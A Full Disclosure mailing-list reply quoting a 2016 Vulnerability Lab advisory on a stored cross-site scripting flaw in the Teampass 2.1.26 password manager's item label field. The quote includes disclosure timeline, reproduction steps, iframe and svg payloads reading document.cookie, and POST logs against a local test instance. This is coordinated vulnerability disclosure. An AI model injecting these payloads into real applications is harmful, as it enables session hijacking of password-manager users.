This looks very similar to the persistent XSS reported a while ago on the Teampass github, is it the same vulnerability?
https://github.com/nilsteampassnet/TeamPass/issues/1244 On 25 May 2016 at 19:10, Vulnerability Lab <[email protected]> wrote: > Document Title: > =============== > Teampass v2.1.26 - Stored Cross Site Scripting Vulnerability > > > References (Source): > ==================== > http://www.vulnerability-lab.com/get_content.php?id=1845 > > > Release Date: > ============= > 2016-05-24 > > > Vulnerability Laboratory ID (VL-ID): > ==================================== > 1845 > > > Common Vulnerability Scoring System: > ==================================== > 3.4 > > > Product & Service Introduction: > =============================== > TeamPass is a Passwords Manager dedicated for managing passwords in a > collaborative way on any server Apache, MySQL and PHP. > It is especially designed to provide passwords access security for allowed > people. This makes TeamPass really useful in a > Business/Enterprise environment and will provide to IT or Team Manager a > powerful and easy tool for customizing passwords > access depending on the user’s role. > > (Copy of the Homepage: http://teampass.net/ ) > > > Abstract Advisory Information: > ============================== > An independent vulnerability laboratory researcher discovered an > application-side cross site scripting vulnerability in the Teampass > v2.1.25/26 application. > > > Vulnerability Disclosure Timeline: > ================================== > 2016-05-17: Researcher Notification & Coordination (Peter Kok) > 2016-05-18 Vendor Notification (Teampass Security Team) > 2016-05-18: Vendor Response/Feedback (Teampass Security Team) > 2016-05-23: Vendor Fix/Patch (Teampass Developer Team) > 2016-05-24: Public Disclosure (Vulnerability Laboratory) > > > Discovery Status: > ================= > Published > > > Affected Product(s): > ==================== > Nils Laumaillé > Product: Teampass Password Manager - Online Service (Web-Application) > 2.1.25 > > Nils Laumaillé > Product: Teampass Password Manager - Online Service (Web-Application) > 2.1.26 > > > Exploitation Technique: > ======================= > Remote > > > Severity Level: > =============== > Medium > > > Technical Details & Description: > ================================ > An application-side cross site scripting web vulnerability has been > discovered in the official Teampass v2.1.26 web-application. > The vulnerability allows remote attackers to inject own malicious script > codes to the application-side of the vulnerable module or function. > > Teampass allows authenticated users to create items to store usernames, > passwords, descriptions, files and more. When creating or editing an > item the very first field, the label field, is vulnerable to iframe > injection and XSS insertion. The iframe or cross site scripting will be > executed as soon as a user opens a folder. The attack vector is persistent > and the request method to inject is POST. > > The security risk of the application-side vulnerability is estimated as > medium with a cvss (common vulnerability scoring system) count of 3.4. > Exploitation of the persistent web vulnerability requires a low privileged > web-application user account and low or medium user interaction. > Successful exploitation of the vulnerability results in session hijacking, > persistent phishing attacks, persistent external redirects to > malicious source and persistent manipulation of affected or connected > application modules. > > Request Method(s): > [+] POST > > Vulnerable Function(s): > [+] Add or Edit (Label) > > Vulnerable Parameter(s): > [+] label name > > Affected Module(s): > [+] Item Listing > > > Proof of Concept (PoC): > ======================= > The persistent cross site scripting web vulnerability can be exploited by > remote attackers without privileged web-application user account and low or > medium user interaction. > For security demonstration or to reproduce the vulnerability follow the > provided information and steps below to continue. > > Manual steps to reproduce the vulnerability ... > 1. Create or edit an item > 2. Change the first label name field to a script code payload > Note: Vulnerability Lab"><iframe SRC="http://www.vulnerability-lab.com/"; > onload=alert(document.cookie)<></iframe> or > <svg/onload=alert(document.cookie)> > 3. The execute occurs in the main label field output context value > 4. Successful reproduce of the application-side vulnerability! > > > --- PoC Session Logs [POST] --- > Status: 200[OK] > POST http://teampass.localhost:8080/index.php/pwd/aj_edit_save/73 > Mime Type[application/json] > Request Header: > Host[teampass.localhost:8080] > User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) > Gecko/20100101 Firefox/46.0] > Accept[application/json, text/javascript, */*; q=0.01] > X-Requested-With[XMLHttpRequest] > Referer[http://teampass.localhost:8080/index.php/pwd/view/73] > Cookie[__utma=66503851.473320856.1464166381.1464166381.1464166381.1; > PHPSESSID=s9iq39avpg0k5vjc896p0m5tb6] > Connection[keep-alive] > POST-Daten: > cproject_id[23] > password_id[73] > name[Dans+Linux+user+%22%3E%3C[SCIRPT CODE PAYLOAD INJECT VIA NAME > LABEL!]%3E] > tags[] > hidden-tags[] > access_info[] > faketextdonotautofill1[] > username[dan] > faketextdonotautofill2[] > email[] > fakepwddonotautofill1[] > password[hello] > password_visible[hello] > fakepwddonotautofill2[] > repeat_password[hello] > repeat_password_visible[hello] > expiry_date_edit[] > notes[] > Response Header: > Date[Wed, 25 May 2016 08:53:48 GMT] > Server[Apache] > X-Powered-By[PHP/5.4.4-14+deb7u8] > Expires[Thu, 19 Nov 1981 08:52:00 GMT] > Cache-Control[no-store, no-cache, must-revalidate, post-check=0, > pre-check=0] > Pragma[no-cache] > Content-Length[74] > Keep-Alive[timeout=5, max=99] > Connection[Keep-Alive] > Content-Type[application/json; charset=utf-8] > - > Status: 200[OK] > GET http://teampass.localhost:8080/index.php/checkss/n/pwd > Mime Type[text/html] > Request Header: > Host[teampass.localhost:8080] > User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) > Gecko/20100101 Firefox/46.0] > Accept[text/html, */*; q=0.01] > X-Requested-With[XMLHttpRequest] > Referer[http://teampass.localhost:8080/index.php/pwd/view/73] > Cookie[__utma=66503851.473320856.1464166381.1464166381.1464166381.1; > __utmb=66503851.1.10.1464166381; PHPSESSID=s9iq39avpg0k5vjc896p0m5tb6] > Connection[keep-alive] > Response Header: > Date[Wed, 25 May 2016 08:53:49 GMT] > Server[Apache] > X-Powered-By[PHP/5.4.4-14+deb7u8] > Connection[Keep-Alive] > Content-Type[text/html] > > > Reference(s): > http://teampass.localhost:8080/ > http://teampass.localhost:8080/index.php/ > http://teampass.localhost:8080/index.php/pwd/ > http://teampass.localhost:8080/index.php/checkss/ > http://teampass.localhost:8080/index.php/checkss/n/ > http://teampass.localhost:8080/index.php/checkss/n/pwd > http://teampass.localhost:8080/index.php/pwd/aj_edit_save/ > http://teampass.localhost:8080/index.php/pwd/aj_edit_save/73 > > > Security Risk: > ============== > The security risk of the application-side cross site scripting > vulnerability in the teampass application is estimated as medium. (CVSS 3.4) > > > Credits & Authors: > ================== > Peter Kok - [http://www.vulnerability-lab.com/show.php?user=Peter%20Kok] > > > Disclaimer & Information: > ========================= > The information provided in this advisory is provided as it is without any > warranty. Vulnerability Lab disclaims all warranties, either expressed or > implied, > including the warranties of merchantability and capability for a > particular purpose. Vulnerability-Lab or its suppliers are not liable in > any case of damage, > including direct, indirect, incidental, consequential loss of business > profits or special damages, even if Vulnerability-Lab or its suppliers have > been advised > of the possibility of such damages. Some states do not allow the exclusion > or limitation of liability for consequential or incidental damages so the > foregoing > limitation may not apply. We do not approve or encourage anybody to break > any licenses, policies, deface websites, hack into databases or trade with > stolen data. > > Domains: www.vulnerability-lab.com - www.vuln-lab.com > - www.evolution-sec.com > Contact: [email protected] - > [email protected] - > [email protected] > Section: magazine.vulnerability-lab.com - > vulnerability-lab.com/contact.php - > evolution-sec.com/contact > Social: twitter.com/vuln_lab - > facebook.com/VulnerabilityLab - > youtube.com/user/vulnerability0lab > Feeds: vulnerability-lab.com/rss/rss.php - > vulnerability-lab.com/rss/rss_upcoming.php - > vulnerability-lab.com/rss/rss_news.php > Programs: vulnerability-lab.com/submit.php - > vulnerability-lab.com/list-of-bug-bounty-programs.php - > vulnerability-lab.com/register.php > > Any modified copy or reproduction, including partially usages, of this > file requires authorization from Vulnerability Laboratory. Permission to > electronically > redistribute this alert in its unmodified form is granted. All other > rights, including the use of other media, are reserved by Vulnerability-Lab > Research Team or > its suppliers. All pictures, texts, advisories, source code, videos and > other information on this website is trademark of vulnerability-lab team & > the specific > authors or managers. To record, list, modify, use or edit our material > contact (admin@ or [email protected]) to get a ask > permission. > > Copyright © 2016 | Vulnerability > Laboratory - [Evolution Security GmbH]™ > > > > > -- > VULNERABILITY LABORATORY - RESEARCH TEAM > SERVICE: www.vulnerability-lab.com > CONTACT: [email protected] > > > _______________________________________________ > Sent through the Full Disclosure mailing list > https://nmap.org/mailman/listinfo/fulldisclosure > Web Archives & RSS: http://seclists.org/fulldisclosure/ -- “If debugging is the process of removing software bugs, then programming must be the process of putting them in.” - *Edsger Dijkstra* _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
